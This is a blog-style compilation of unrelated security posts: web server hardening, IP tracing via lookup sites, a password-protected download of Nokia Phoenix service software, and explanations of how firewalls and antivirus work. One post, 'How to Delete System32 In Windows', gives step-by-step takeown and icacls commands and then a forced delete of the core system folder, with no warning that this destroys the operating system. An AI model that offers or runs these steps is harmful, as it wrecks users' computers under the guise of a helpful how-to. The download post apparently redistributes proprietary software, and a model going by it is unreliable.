How To Protect Web Server From Hackers

Creating your own website is not simply about putting some pages and information online. Ensuring the security of your website is a bigger and highly crucial task. Most websites these days have a dedicated web server that gives them the leverage to grow and develop further. Basically the websites with a high volume of web traffic, a heavy database and complex application specifications require an exclusive web server. It is extremely important to hack proof your web server in order to protect your website and business.

There are a great number of hackers out there in the web world who are looking for opportunities to exploit your web server and cause serious damage. These hackers look to deface the websites with malicious content, use the scripts on the server to send out spam or phish out the personal sensitive information of the website users. Such attacks also attempt to tamper with parameters and gain access to confidential files or cross-site scripting or cookie poisoning to alter the customer data. These kinds of invasions can prove to be fatal for e-commerce and finance based websites. To prevent your web server from falling prey to such web attacks, here are some important recommendations and anti hacking tips.You need to follow a two-pronged approach to safeguard your web server from any hackers.

The first layer is a firewall that exists to block any unwarranted unused Internet ports. A good firewall will use a rule based access system to allow only the legitimate users to enter and filter out as well as obstruct any malicious traffic from accessing the server. Also create strong passwords that use a combination of characters, numbers and special characters in order to keep the password hackers at bay.

The second element is to put in place an intrusion protection service. This is a more sophisticated approach to deal with hackers wherein you stop the illegitimate entry of users at the source itself. If a firewall works on the front line, an intrusion protection system works on the back end to deal with the enemies. This involves putting all the compromised hosts in the quarantine section and letting the genuine users move through efficiently. But setting up such an anti-hacking arrangement is only the first step. The hackers are moving fast and ahead with newer techniques to break into and sabotage the web servers. So, you need to continually update and monitor the filters, blacklists and all other aspects

HOW TO TRACE IP ADDRESS

In my earlier post I had discussed abouthow to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com.

Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.

1. Country in which the IP is located

2. Region

3. City

4. Latitude/Longitude

5. Zip Code

6. Time Zone

7. Name of the ISP

8. Internet Speed

9. Weather Station

10. Area Code and

11. Domain name associated with the IP address.

A sample snapshot of the results from ip2location.com is given below

You can also visually trace route any IP address back to it’s location. For this just visithttp://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments

Phoenix Service Software Free Download For Win7 or Xp

     Pheonix Service Software 2012.04.003.47798 (rel v 16/2/2012)

Password: genuine
Download From Download Option Given Here >>>>>>>>>>>

 Phoenix Is very Powefull Software For Windows For Updating Your Phones Firmware Files
 If You Dont Know That What Is phoenix And How To use It Dont Worry I will Explian it In My Next Post

Main component versions in the release:
• Product API 2012.2.2
• Nokia Connectivity Cable USB Driver Version 7.1.69.0
• Flash Update Package 2011.50
• FUSE Connection Manager v 2011.51

KNOWN ERRORS & LIMITATIONS

• FLS-5 drivers do not support 64 bit OS, so phones using FLS-5 /USB_FBUS connection can not be serviced in 64 bit operating systems

• Software downgrade with Tucson system is only possible for BB 5.0 products supporting the Data Package 2 concept.

• Flashing with setup FLS-5, SS-46 and product specific adapter is not supported anymore. FLS-5 can be used with other product specific cables and adapters, but not with SS-46 Interface Adapter.

• If you install old DCT-4 data packages, Flash Update Package File installation path may be wrong. This is caused by very old DCT-4 data packages which contain Flash Update Package and overwrite current information during installation. If you experience problems when updating FPS-x prommers, please check that Phoenix “Prommer maintenance” is looking for the files from the correct location which is “C:\Program Files\Common Files\Nokia\Tss\Flash”. If not, Phoenix will show error “Update via ini – file failed”. In this case, select “Update” from that Phoenix “Prommer maintenance” – UI, browse to correct directory and select “fpsxupd.ini” for all other prommers except the FPS-8.

• FPS-21 flashing for RX-51 works only with TCPIP connection. FPS-21 prommer with new HW version 11 has been released to correct this. Sales pack code is 0089J83 , old HW version is not delivered anymore

• Please refer to product specific documents and instructions concerning the limitations of the RX-51 product

• When version 2010_12_8_42304 or newer with FUSE connection manager is installed on top of older Phoenix versions, there may be an additional delay of several minutes when you start Phoenix for the first time. Please wait patiently; Phoenix will start after configuration is finished.

• When using Data Package download functions with online connection, download times may occasionally be long. This is not caused by Phoenix (or Care Suite). The download speed from online servers is occasionally is known to be slow, depending on how data is buffered on caching servers.

• After you close Phoenix, it may not restart. To rectify this:
– Use Windows Task Manager to manually shut down phoenix.exe and FuseService.exe processes, or optionally restart your PC

• It is not possible to program Mass Media Content file to some devices over direct USB cable connection, due to the large size of the file. For these models a feature called “Media Check” has been implemented. When this type of product is connected to service software / PC via direct USB cable the refurbishment option will be disabled. Please use a flash prommer. Affected products using Media Check are: RM-122, RM-175, RM-176, RM-186, RM-246, RM-247, RM-296, RM-297, RM-320, RM-462, RM-472, RM-484, RM-505, RM-555, RM-559

• To be able to use the help files in Windows 7 you need to install Windows Help program (WinHlp32.exe) for Windows 7. Ways to locate WinHlp32.exe:
– Start Phoenix with online connection to Internet, select “Help” and “Phoenix help”. Click the “Microsoft Help and Support” website link. Download WinHlp32 and install it.- Go to http://www.microsoft.com. Type “WinHlp32″ to “Search Microsoft.com” – field. Locate Windows Help program (WinHlp32.exe) for Windows 7 and install it

• When using flash prommers, only one connection type to one prommer is allowed. Please use either NFPD USB or NFPD TCPIP connection to one prommer, not both connections to same prommer

Supported operating systems and user rights

• Windows XP Service Pack 1 or higher

• When installing Phoenix into Win XP you must have local admin rights.

• When using in Win XP, user must have power user rights.

• Windows 7 32 Bit version

• Windows 7 64 Bit version (Please note that FLS-5 drivers do not support Win 7 64 bit OS, therefore FLS-5 can not be used in this operating system]

HOW FIREWALL WORKS

If you have been using Internet on a regular basis or working in a large company and surf the Internet while you are at work, you must have surely come across the term firewall.

You might have also heard of people saying “firewalls protect their computer from web attacks and hackers” or “a certain website has been blocked by firewall in their work place”. If you have ever wondered to know what exactly is this firewall and how it works, here we go. In this post I will try to explain “How firewalls work” in a layman’s terms.

How Firewalls Work:

Firewalls are basically a barrier between your computer (or a network) and the Internet (outside world). A firewall can be simply compared to a security guard who stands at the entrance of your house and filters the visitors coming to your place. He may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly a firewall is a software program or a hardware device that filters the information (packets) coming through the Internet to your personal computer or a computer network.

Firewalls may decide to allow or block network traffic between devices based on the rules that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules that are most suitable under normal circumstances so that the user need not worry much about configuring the firewall.

Personal firewalls are easy to install and use and hence preferred by end-users for use on their personal computers.  However large networks and companies prefer those firewalls that have plenty of options to configure so as to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and Web servers. In addition the company can even control how the employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus in addition to security, a firewall can give the company a tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:

1. Packet Filtering: In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded.

2. Stateful Inspection: This is a newer method that doesn’t analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are allowed to travel further. Otherwise they are discarded.

Firewall Configuration

Firewalls can be configured by adding one or more filters based on several conditions as mentioned below:

1. IP addresses: In any case if an IP address outside the network is said to be unfavorable, then it is possible to set  filter to block all the traffic to and from that IP address. For example, if a cetain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.

2. Domain names: Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names.

3. Ports/Protocols: Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a Web (HTTP) service then it will be typically available on port 80. In order to avail this service, the client needs to connect to the server via port 80. Similarly different services such as Telnet (Port 23), FTP (port 21) and SMTP (port 25) services may be running on the server. If the services are intended for the public, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections.

4. Specific words or phrases: A firewall can be configured to filter one or more specific words or phrases so that, both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network.

Hardware vs. Software Firewall

Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority whereas, the software firewalls are less expensive and are most preferred in home computers and laptops. Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet in the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router.

Why Firewall?

Firewalls provide security over a number of online threats such as Remote login, Trojan backdoors, Session hijacking, DOS & DDOS attacks, viruses, cookie stealing and many more. The effectiveness of the security depends on the way you configure the firewall and how you set up the filter rules. However major threats such as DOS and DDOS attacks may sometimes manage to bypass the firewalls and do the damage to the server. Even though firewall is not a complete answer to online threats, it can most effectively handle the attacks and provide security to the computer up to the maximum possible extenT.

                              PLEASE COMMENT

How to Delete System32 In Windows

Instructions

1. Acquire Ownership

   • 1
     Click “Start,” type “cmd” and press the “Ctrl,” “Shift” and “Enter” keys together to load the Command Prompt console with administrative privileges.
   • 2
     Type “takeown /f C:\Windows\System32” and press “Enter” to take ownership of the System32 folder.
   • 3
     Type “Icacls C:\Windows\System32 ” and press “Enter” to give yourself rights to delete the “System32” folder.
   • 4
     Close the Command Prompt console by typing “Exit” and then pressing “Enter.”

   Delete Folder

   • 5
     Close all applications that are running on your computer.
   • 6
     Double-click the “Computer” icon on the Windows desktop to open “Windows Explorer.”
   • 7
     Double-click the icon labeled “Local Disk C:” and then enter the folder labeled “Windows.”
   • 8
     Select the folder labeled “System32” by clicking on it.
   • 9
     Press the “Shift” and “Del” keys together and click “Yes” on the “Delete Folder” confirmation dialog box to delete the “System32” folder. Click “Yes to All” on any “File Delete” dialog boxes that you encounter during the file deletion process.

HOW ANTIVIRUS WORKS

Due to ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer. Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works! Well if you are one among those few who would really bother to understand how an antivirus works, then this article is for you.

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

1. Signature-based dectection (Dictionary approach)

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk. 

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.

Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.

2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus softwares to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

Most commercial antivirus softwares use a combination of both signature-based and heuristic-based approaches to combat malware.

Issues of concern

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.

Daily Updates: Since new viruses and threats are released everyday, it is most essential to update the antivirus software so as to keep the virus definitions up-to-date. Most softwares will have an auto-update feature so that the virus definitions are updated whenever the computer is connected to the Internet.

Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.

Thus user education is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.